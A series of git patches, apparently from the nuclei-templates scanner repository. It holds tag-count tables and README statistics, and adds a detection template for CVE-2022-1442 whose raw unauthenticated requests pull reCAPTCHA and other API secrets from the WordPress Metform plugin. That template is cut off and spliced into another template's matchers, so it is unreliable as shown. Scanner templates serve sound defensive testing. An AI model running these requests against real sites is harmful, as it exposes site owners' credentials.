+| opennebula | 1 | | | | | | | | | +| novus | 1 | | | | | | | | | +| tbk | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| kyocera | 1 | | | | | | | | | +| dolphinscheduler | 1 | | | | | | | | | +| apigee | 1 | | | | | | | | | +| juniper | 1 | | | | | | | | | +| vtiger | 1 | | | | | | | | | +| inetutils | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| free5gc | 1 | | | | | | | | | +| short.io | 1 | | | | | | | | | +| streetview | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| screenshot | 1 | | | | | | | | | +| wakatime | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| amdoren | 1 | | | | | | | | | +| beego | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| suprema | 1 | | | | | | | | | +| jabber | 1 | | | | | | | | | +| scraperbox | 1 | | | | | | | | | +| wpify | 1 | | | | | | | | | +| wget | 1 | | | | | | | | | +| bravenewcoin | 1 | | | | | | | | | +| currencyscoop | 1 | | | | | | | | | +| clockify | 1 | | | | | | | | | +| savepage | 1 | | | | | | | | | +| adb | 1 | | | | | | | | | +| ncomputing | 1 | | | | | | | | | +| kingdee | 1 | | | | | | | | | +| nport | 1 | | | | | | | | | +| hivequeue | 1 | | | | | | | | | +| xamr | 1 | | | | | | | | | +| trilium | 1 | | | | | | | | | +| prototype | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| webshell4 | 1 | | | | | | | | | +| lumis | 1 | | | | | | | | | +| front | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| rollupjs | 1 | | | | | | | | | +| qualtrics | 1 | | | | | | | | | +| smi | 1 | | | | | | | | | +| passwordmanager | 1 | | | | | | | | | +| serverstatus | 1 | | | | | | | | | +| pcoweb | 1 | | | | | | | | | +| daybyday | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| oam | 1 | | | | | | | | | +| sv3c | 1 | | | | | | | | | +| workreap | 1 | | | | | | | | | +| securityspy | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| sauter | 1 | | | | | | | | | +| thinkserver | 1 | | | | | | | | | +| ecshop | 1 | | | | | | | | | +| management | 1 | | | | | | | | | +| hangfire | 1 | | | | | | | | | +| sterling | 1 | | | | | | | | | +| droneci | 1 | | | | | | | | | +| ntop | 1 | | | | | | | | | +| encompass | 1 | | | | | | | | | +| sungrow | 1 | | | | | | | | | +| darktrace | 1 | | | | | | | | | +| pa11y | 1 | | | | | | | | | +| cve2002 | 1 | | | | | | | | | +| wordcloud | 1 | | | | | | | | | +| cooperhewitt | 1 | | | | | | | | | +| docebo | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| onelogin | 1 | | | | | | | | | +| arprice-responsive-pricing-table | 1 | | | | | | | | | +| jsmol2wp | 1 | | | | | | | | | +| qualcomm | 1 | | | | | | | | | +| rpcms | 1 | | | | | | | | | +| flyway | 1 | | | | | | | | | +| ventrilo | 1 | | | | | | | | | +| cmsimple | 1 | | | | | | | | | +| jumpcloud | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| antsword | 1 | | | | | | | | | +| nagios-xi | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| sponip | 1 | | | | | | | | | +| mcloud | 1 | | | | | | | | | +| interactsh | 1 | | | | | | | | | +| dnn | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| blitapp | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| uvdesk | 1 | | | | | | | | | +| html2wp | 1 | | | | | | | | | +| wordpress-country-selector | 1 | | | | | | | | | +| jgraph | 1 | | | | | | | | | +| submitty | 1 | | | | | | | | | +| xenforo | 1 | | | | | | | | | +| bottle | 1 | | | | | | | | | +| ubiquiti | 1 | | | | | | | | | +| logontracer | 1 | | | | | | | | | +| nconf | 1 | | | | | | | | | +| sh | 1 | | | | | | | | | +| concourse | 1 | | | | | | | | | +| revealjs | 1 | | | | | | | | | +| cron | 1 | | | | | | | | | +| webnms | 1 | | | | | | | | | +| zzzphp | 1 | | | | | | | | | +| buttercms | 1 | | | | | | | | | +| sassy | 1 | | | | | | | | | +| clearbit | 1 | | | | | | | | | +| shoretel | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| xlight | 1 | | | | | | | | | +| scanii | 1 | | | | | | | | | +| satellian | 1 | | | | | | | | | +| binance | 1 | | | | | | | | | +| trello | 1 | | | | | | | | | +| bitquery | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| kvm | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| payroll | 1 | | | | | | | | | +| v2924 | 1 | | | | | | | | | +| all-in-one-video-gallery | 1 | | | | | | | | | +| d-link | 1 | | | | | | | | | +| scrapingant | 1 | | | | | | | | | +| istat | 1 | | | | | | | | | +| karel | 1 | | | | | | | | | +| axxonsoft | 1 | | | | | | | | | +| chronoforums | 1 | | | | | | | | | +| wdja | 1 | | | | | | | | | +| sms | 1 | | | | | | | | | +| bagisto | 1 | | | | | | | | | +| satellite | 1 | | | | | | | | | +| zebra | 1 | | | | | | | | | +| footprints | 1 | | | | | | | | | +| hugo | 1 | | | | | | | | | +| beanstalk | 1 | | | | | | | | | +| spartacus | 1 | | | | | | | | | +| member-hero | 1 | | | | | | | | | +| flask | 1 | | | | | | | | | +| cve2001 | 1 | | | | | | | | | +| gsoap | 1 | | | | | | | | | +| phpldap | 1 | | | | | | | | | +| strava | 1 | | | | | | | | | +| mailer | 1 | | | | | | | | | +| mspcontrol | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| opencti | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| moveit | 1 | | | | | | | | | +| myvuehelp | 1 | | | | | | | | | +| routeros | 1 | | | | | | | | | +| led | 1 | | | | | | | | | +| clickhouse | 1 | | | | | | | | | +| vagrant | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| webcenter | 1 | | | | | | | | | +| pubsec | 1 | | | | | | | | | +| qmail | 1 | | | | | | | | | +| novius | 1 | | | | | | | | | +| mirasys | 1 | | | | | | | | | +| h2 | 1 | | | | | | | | | +| cvms | 1 | | | | | | | | | +| vanguard | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| badgeos | 1 | | | | | | | | | +| amt | 1 | | | | | | | | | +| accuweather | 1 | | | | | | | | | +| qts | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| genie | 1 | | | | | | | | | +| fastly | 1 | | | | | | | | | +| ptr | 1 | | | | | | | | | +| e2pdf | 1 | | | | | | | | | +| mx | 1 | | | | | | | | | +| nimsoft | 1 | | | | | | | | | +| emobile | 1 | | | | | | | | | +| pieregister | 1 | | | | | | | | | +| openid | 1 | | | | | | | | | +| employment | 1 | | | | | | | | | +| maestro | 1 | | | | | | | | | +| imap | 1 | | | | | | | | | +| issabel | 1 | | | | | | | | | +| schneider | 1 | | | | | | | | | +| guard | 1 | | | | | | | | | +| kramer | 1 | | | | | | | | | +| smartping | 1 | | | | | | | | | +| asa | 1 | | | | | | | | | +| turbo | 1 | | | | | | | | | +| clickup | 1 | | | | | | | | | +| panasonic | 1 | | | | | | | | | +| academylms | 1 | | | | | | | | | +| sumowebtools | 1 | | | | | | | | | +| accessmanager | 1 | | | | | | | | | +| openmage | 1 | | | | | | | | | +| monitoring | 1 | | | | | | | | | +| kenesto | 1 | | | | | | | | | +| wms | 1 | | | | | | | | | +| twig | 1 | | | | | | | | | +| editor | 1 | | | | | | | | | +| comfortel | 1 | | | | | | | | | +| biqsdrive | 1 | | | | | | | | | +| deviantart | 1 | | | | | | | | | +| unauthenticated | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| alumni | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| php-fusion | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| yaws | 1 | | | | | | | | | +| europeana | 1 | | | | | | | | | +| webuzo | 1 | | | | | | | | | +| piano | 1 | | | | | | | | | +| natemail | 1 | | | | | | | | | +| ixbusweb | 1 | | | | | | | | | +| ewebs | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| emessage | 1 | | | | | | | | | +| webasyst | 1 | | | | | | | | | +| supportivekoala | 1 | | | | | | | | | +| dbeaver | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| lacie | 1 | | | | | | | | | +| vcloud | 1 | | | | | | | | | +| xds | 1 | | | | | | | | | +| coinmarketcap | 1 | | | | | | | | | +| concrete5 | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| fcm | 1 | | | | | | | | | +| jumpserver | 1 | | | | | | | | | +| lob | 1 | | | | | | | | | +| bitcoinaverage | 1 | | | | | | | | | +| xproxy | 1 | | | | | | | | | +| ray | 1 | | | | | | | | | +| gnuboard5 | 1 | | | | | | | | | +| strider | 1 | | | | | | | | | +| cloudfoundry | 1 | | | | | | | | | +| festivo | 1 | | | | | | | | | +| cloudron | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| primefaces | 1 | | | | | | | | | +| dreamweaver | 1 | | | | | | | | | +| virustotal | 1 | | | | | | | | | +| knowage | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| hunter | 1 | | | | | | | | | +| rustici | 1 | | | | | | | | | +| geolocation | 1 | | | | | | | | | +| roads | 1 | | | | | | | | | +| memory-pipes | 1 | | | | | | | | | +| instatus | 1 | | | | | | | | | +| directadmin | 1 | | | | | | | | | +| owa | 1 | | | | | | | | | +| tinymce | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| open-school | 1 | | | | | | | | | +| aniapi | 1 | | | | | | | | | +| niagara | 1 | | | | | | | | | +| hanming | 1 | | | | | | | | | +| buddy | 1 | | | | | | | | | +| web3 | 1 | | | | | | | | | +| openshift | 1 | | | | | | | | | +| vision | 1 | | | | | | | | | +| qizhi | 1 | | | | | | | | | +| whmcs | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| mobile | 1 | | | | | | | | | +| lenovo | 1 | | | | | | | | | +| roteador | 1 | | | | | | | | | +| nessus | 1 | | | | | | | | | +| pods | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| opensearch | 1 | | | | | | | | | +| vault | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| securenvoy | 1 | | | | | | | | | +| ssi | 1 | | | | | | | | | +| aims | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| fusion | 1 | | | | | | | | | +| pagerduty | 1 | | | | | | | | | +| whm | 1 | | | | | | | | | +| shopizer | 1 | | | | | | | | | +| zerodium | 1 | | | | | | | | | +| coinlayer | 1 | | | | | | | | | +| phpminiadmin | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| ip2whois | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| cve2000 | 1 | | | | | | | | | +| phpfastcache | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| wampserver | 1 | | | | | | | | | +| ucp | 1 | | | | | | | | | +| tembosocial | 1 | | | | | | | | | +| dbt | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| ojs | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| razer | 1 | | | | | | | | | +| shopify | 1 | | | | | | | | | +| proxycrawl | 1 | | | | | | | | | +| holidayapi | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| meshcentral | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| caa | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| kronos | 1 | | | | | | | | | +| opencart | 1 | | | | | | | | | +| slocum | 1 | | | | | | | | | +| sitefinity | 1 | | | | | | | | | +| contentkeeper | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| atvise | 1 | | | | | | | | | +| travis | 1 | | | | | | | | | +| jsonbin | 1 | | | | | | | | | +| google-earth | 1 | | | | | | | | | +| xyxel | 1 | | | | | | | | | +| pihole | 1 | | | | | | | | | +| cvnd2018 | 1 | | | | | | | | | +| axel | 1 | | | | | | | | | +| easync-booking | 1 | | | | | | | | | +| pypicloud | 1 | | | | | | | | | +| connect-central | 1 | | | | | | | | | +| officekeeper | 1 | | | | | | | | | +| blackduck | 1 | | | | | | | | | +| xmpp | 1 | | | | | | | | | +| dropbear | 1 | | | | | | | | | +| intelx | 1 | | | | | | | | | +| yarn | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| photostation | 1 | | | | | | | | | +| vibe | 1 | | | | | | | | | +| siteomat | 1 | | | | | | | | | +| eyelock | 1 | | | | | | | | | +| exchangerateapi | 1 | | | | | | | | | +| helpdesk | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| vivotex | 1 | | | | | | | | | +| pkp-lib | 1 | | | | | | | | | +| rsvpmaker | 1 | | | | | | | | | +| jreport | 1 | | | | | | | | | +| brandfolder | 1 | | | | | | | | | +| fontawesome | 1 | | | | | | | | | +| iq-block-country | 1 | | | | | | | | | +| suitecrm | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| dixell | 1 | | | | | | | | | +| userstack | 1 | | | | | | | | | +| weglot | 1 | | | | | | | | | +| opensso | 1 | | | | | | | | | +| burp | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| fms | 1 | | | | | | | | | +| tufin | 1 | | | | | | | | | +| bitrise | 1 | | | | | | | | | +| perl | 1 | | | | | | | | | +| u5cms | 1 | | | | | | | | | +| pirelli | 1 | | | | | | | | | +| webctrl | 1 | | | | | | | | | +| appveyor | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| postmark | 1 | | | | | | | | | +| place | 1 | | | | | | | | | +| asanhamayesh | 1 | | | | | | | | | +| bigfix | 1 | | | | | | | | | +| rackup | 1 | | | | | | | | | +| archibus | 1 | | | | | | | | | +| emerson | 1 | | | | | | | | | +| nuget | 1 | | | | | | | | | +| phpsec | 1 | | | | | | | | | +| gerapy | 1 | | | | | | | | | +| sage | 1 | | | | | | | | | +| shell | 1 | | | | | | | | | +| netic | 1 | | | | | | | | | +| mastodon | 1 | | | | | | | | | +| reprise | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| 1forge | 1 | | | | | | | | | +| mdm | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| polarisft | 1 | | | | | | | | | +| adoptapet | 1 | | | | | | | | | +| cucm | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| ind780 | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| shindig | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| audiocode | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| cofense | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| netbiblio | 1 | | | | | | | | | +| avatier | 1 | | | | | | | | | +| wowza | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| cliniccases | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| tiny | 1 | | | | | | | | | +| bibliopac | 1 | | | | | | | | | +| smuggling | 1 | | | | | | | | | +| taiga | 1 | | | | | | | | | +| remedy | 1 | | | | | | | | | +| etherscan | 1 | | | | | | | | | +| clockwork | 1 | | | | | | | | | +| dplus | 1 | | | | | | | | | +| powerjob | 1 | | | | | | | | | +| iframe | 1 | | | | | | | | | +| browserless | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| dapr | 1 | | | | | | | | | +| cloudera | 1 | | | | | | | | | +| fleet | 1 | | | | | | | | | +| ethereum | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| sofneta | 1 | | | | | | | | | +| tianqing | 1 | | | | | | | | | +| biotime | 1 | | | | | | | | | +| zap | 1 | | | | | | | | | +| mailwatch | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| permissions | 1 | | | | | | | | | +| imagements | 1 | | | | | | | | | +| h-sphere | 1 | | | | | | | | | +| room-alert | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| defectdojo | 1 | | | | | | | | | +| alquist | 1 | | | | | | | | | +| teltonika | 1 | | | | | | | | | +| franklinfueling | 1 | | | | | | | | | +| autocomplete | 1 | | | | | | | | | +| nozomi | 1 | | | | | | | | | +| buddypress | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| securitytrails | 1 | | | | | | | | | +| synapse | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| opnsense | 1 | | | | | | | | | +| orangeforum | 1 | | | | | | | | | +| workresources | 1 | | | | | | | | | +| activecollab | 1 | | | | | | | | | +| liquibase | 1 | | | | | | | | | +| shortcode | 1 | | | | | | | | | +| wp-fundraising-donation | 1 | | | | | | | | | +| ebird | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| okta | 1 | | | | | | | | | +| advanced-booking-calendar | 1 | | | | | | | | | +| wp-cli | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| davantis | 1 | | | | | | | | | +| hdnetwork | 1 | | | | | | | | | +| html2pdf | 1 | | | | | | | | | +| screenshotapi | 1 | | | | | | | | | +| webex | 1 | | | | | | | | | +| web-suite | 1 | | | | | | | | | +| basic-auth | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| camunda | 1 | | | | | | | | | +| binom | 1 | | | | | | | | | +| extreme | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| tink | 1 | | | | | | | | | +| tor | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| ti-woocommerce-wishlist | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| awin | 1 | | | | | | | | | +| headers | 1 | | | | | | | | | +| filr | 1 | | | | | | | | | +| fullhunt | 1 | | | | | | | | | +| opsgenie | 1 | | | | | | | | | +| airnotifier | 1 | | | | | | | | | +| placeos | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index a8a5899718..98bf44a85e 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1510 | dhiyaneshdk | 679 | cves | 1488 | info | 1604 | http | 4170 | -| panel | 736 | daffainfo | 657 | exposed-panels | 741 | high | 1127 | file | 77 | -| edb | 574 | pikpikcu | 340 | vulnerabilities | 517 | medium | 812 | network | 68 | -| xss | 526 | pdteam | 274 | misconfiguration | 322 | critical | 534 | dns | 17 | -| lfi | 518 | geeknik | 196 | technologies | 303 | low | 249 | | | -| exposure | 505 | dwisiswant0 | 171 | exposures | 299 | unknown | 21 | | | -| wordpress | 455 | 0x_akoko | 169 | token-spray | 235 | | | | | +| cve | 1526 | dhiyaneshdk | 687 | cves | 1504 | info | 1618 | http | 4218 | +| panel | 747 | daffainfo | 659 | exposed-panels | 751 | high | 1135 | file | 77 | +| edb | 575 | pikpikcu | 340 | vulnerabilities | 517 | medium | 822 | network | 70 | +| xss | 533 | pdteam | 274 | misconfiguration | 338 | critical | 540 | dns | 17 | +| exposure | 525 | geeknik | 196 | technologies | 306 | low | 260 | | | +| lfi | 518 | dwisiswant0 | 171 | exposures | 300 | unknown | 23 | | | +| wordpress | 460 | 0x_akoko | 169 | token-spray | 235 | | | | | | cve2021 | 365 | ritikchaddha | 159 | workflows | 190 | | | | | -| wp-plugin | 350 | pussycat0x | 155 | default-logins | 111 | | | | | -| rce | 342 | princechaddha | 151 | file | 77 | | | | | +| wp-plugin | 355 | pussycat0x | 157 | default-logins | 113 | | | | | +| rce | 343 | princechaddha | 153 | file | 77 | | | | | From e8a4fdf8179eec3ebe46d13e7ce03a40712a9853 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 13 Nov 2022 10:28:15 +0000 Subject: [PATCH 0238/1415] Auto README Update [Sun Nov 13 10:28:15 UTC 2022] :robot: --- README.md | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/README.md b/README.md index 2ebc7dbd0a..cdb1e8244e 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1510 | dhiyaneshdk | 679 | cves | 1488 | info | 1604 | http | 4170 | -| panel | 736 | daffainfo | 657 | exposed-panels | 741 | high | 1127 | file | 77 | -| edb | 574 | pikpikcu | 340 | vulnerabilities | 517 | medium | 812 | network | 68 | -| xss | 526 | pdteam | 274 | misconfiguration | 322 | critical | 534 | dns | 17 | -| lfi | 518 | geeknik | 196 | technologies | 303 | low | 249 | | | -| exposure | 505 | dwisiswant0 | 171 | exposures | 299 | unknown | 21 | | | -| wordpress | 455 | 0x_akoko | 169 | token-spray | 235 | | | | | +| cve | 1526 | dhiyaneshdk | 687 | cves | 1504 | info | 1618 | http | 4218 | +| panel | 747 | daffainfo | 659 | exposed-panels | 751 | high | 1135 | file | 77 | +| edb | 575 | pikpikcu | 340 | vulnerabilities | 517 | medium | 822 | network | 70 | +| xss | 533 | pdteam | 274 | misconfiguration | 338 | critical | 540 | dns | 17 | +| exposure | 525 | geeknik | 196 | technologies | 306 | low | 260 | | | +| lfi | 518 | dwisiswant0 | 171 | exposures | 300 | unknown | 23 | | | +| wordpress | 460 | 0x_akoko | 169 | token-spray | 235 | | | | | | cve2021 | 365 | ritikchaddha | 159 | workflows | 190 | | | | | -| wp-plugin | 350 | pussycat0x | 155 | default-logins | 111 | | | | | -| rce | 342 | princechaddha | 151 | file | 77 | | | | | +| wp-plugin | 355 | pussycat0x | 157 | default-logins | 113 | | | | | +| rce | 343 | princechaddha | 153 | file | 77 | | | | | -**307 directories, 4566 files**. +**312 directories, 4617 files**. From a78a478773680f054bfe5819f207f567188d3eac Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 13 Nov 2022 10:38:04 +0000 Subject: [PATCH 0239/1415] Auto Generated CVE annotations [Sun Nov 13 10:38:04 UTC 2022] :robot: --- cves/2019/CVE-2019-2729.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-2729.yaml b/cves/2019/CVE-2019-2729.yaml index a74411e08d..9d1eca4f52 100644 --- a/cves/2019/CVE-2019-2729.yaml +++ b/cves/2019/CVE-2019-2729.yaml @@ -12,7 +12,7 @@ info: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html - http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-2729 cwe-id: CWE-284 From 3e5b7ce323a7342bce235fe6f57b37fceacce113 Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Sun, 13 Nov 2022 16:19:10 +0530 Subject: [PATCH 0240/1415] Added template for CVE-2022-1442 --- cves/2022/CVE-2022-1442.yaml | 52 ++++++++++++++++++++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 cves/2022/CVE-2022-1442.yaml diff --git a/cves/2022/CVE-2022-1442.yaml b/cves/2022/CVE-2022-1442.yaml new file mode 100644 index 0000000000..d7fbbda0a4 --- /dev/null +++ b/cves/2022/CVE-2022-1442.yaml @@ -0,0 +1,52 @@ +id: CVE-2022-1442 + +info: + name: WordPress Plugin Metform <= 2.1.3 - Unauthenticated Sensitive Information Disclosure + author: theamanrawat + severity: high + description: | + The Metform WordPress plugin is vulnerable to sensitive information disclosure due to improper access control in the ~/core/forms/action.php file which can be exploited by an unauthenticated attacker to view all API keys and secrets of integrated third-party APIs like that of PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA and many more, in versions up to and including 2.1.3. + reference: + - https://gist.github.com/Xib3rR4dAr/6e6c6e5fa1f8818058c7f03de1eda6bf + - https://wordpress.org/plugins/metform/advanced/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-1442 + tags: cve,cve2022,information-disclosure,wpscan,wordpress,wp-plugin,wp,metform,unauth + +requests: + - raw: + - | + GET /wp-json/metform/v1/forms/templates/0 HTTP/1.1 + Host: {{Hostname}} + + - | + GET /wp-json/metform/v1/forms/get/{{id}} HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "mf_recaptcha_secret_key" + - "mf_recaptcha_site_key" + - "mf_recaptcha_site_key_v3" + - "admin_email_from" + condition: and + + - type: status + status: + - 200 + + - type: word + part: header + words: + - "application/json" + + extractors: + - type: regex + name: id + group: 1 + regex: + - '' + - 'xibo-cms' + - 'class="XiboFormButton' + condition: and - type: status status: From 8c0df07b7fc61f07b171a58a0f4bf5f3c0c7ee80 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 14 Nov 2022 09:02:03 +0000 Subject: [PATCH 0273/1415] Auto Generated New Template Addition List [Mon Nov 14 09:02:02 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 129ed9617b..d0f0ce6c14 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +1,6 @@ exposed-panels/opencpu-panel.yaml exposed-panels/tekton-dashboard.yaml +exposed-panels/xibocms-login.yaml iot/pqube-power-analyzers.yaml network/detection/esmtp-detect.yaml network/detection/imap-detect.yaml From 363c48b3c5de89fc7f27fc240c50c208794c8cab Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 14 Nov 2022 14:50:18 +0530 Subject: [PATCH 0274/1415] Update fingerprinthub-web-fingerprints.yaml --- technologies/fingerprinthub-web-fingerprints.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/fingerprinthub-web-fingerprints.yaml b/technologies/fingerprinthub-web-fingerprints.yaml index 5b4733e11d..b0e945fa0b 100755 --- a/technologies/fingerprinthub-web-fingerprints.yaml +++ b/technologies/fingerprinthub-web-fingerprints.yaml @@ -6314,11 +6314,11 @@ requests: - "background-color: #4a93be;" - type: word - condition: or name: jumpserver words: - JumpServer 开源堡垒机 - JumpServer Open Source Bastion Host + condition: or - type: word condition: and From 1ede03bd979934f1bb65193f37206424bfd08b76 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 14 Nov 2022 09:26:04 +0000 Subject: [PATCH 0276/1415] Auto Generated New Template Addition List [Mon Nov 14 09:26:04 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index d0f0ce6c14..d17fee577b 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +cves/2022/CVE-2022-2379.yaml exposed-panels/opencpu-panel.yaml exposed-panels/tekton-dashboard.yaml exposed-panels/xibocms-login.yaml From a0325acc8e21e19042a1a1129b2b2de84d18f3d4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 14 Nov 2022 09:30:36 +0000 Subject: [PATCH 0277/1415] Auto Generated New Template Addition List [Mon Nov 14 09:30:36 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index d17fee577b..eb189d94fb 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +cves/2022/CVE-2022-1442.yaml cves/2022/CVE-2022-2379.yaml exposed-panels/opencpu-panel.yaml exposed-panels/tekton-dashboard.yaml From 299b7850605f2acb4ba2b32c7f08aa87af9c1fed Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 14 Nov 2022 09:41:13 +0000 Subject: [PATCH 0278/1415] Auto Generated CVE annotations [Mon Nov 14 09:41:13 UTC 2022] :robot: --- cves/2022/CVE-2022-2379.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/cves/2022/CVE-2022-2379.yaml b/cves/2022/CVE-2022-2379.yaml index 333558524f..096d9efc33 100644 --- a/cves/2022/CVE-2022-2379.yaml +++ b/cves/2022/CVE-2022-2379.yaml @@ -11,10 +11,13 @@ info: - https://wordpress.org/plugins/easy-student-results/ - https://nvd.nist.gov/vuln/detail/CVE-2022-2379 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2022-2379 + cwe-id: CWE-862 metadata: - verified: true - tags: cve,cve2022,wordpress,wp-plugin,wp,easy-student-results,disclosure + verified: "true" + tags: wordpress,wp-plugin,wp,easy-student-results,disclosure,wpscan,cve,cve2022 requests: - raw: From 79908100b916de7f28c15c4c5db5d1e4107a4250 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 14 Nov 2022 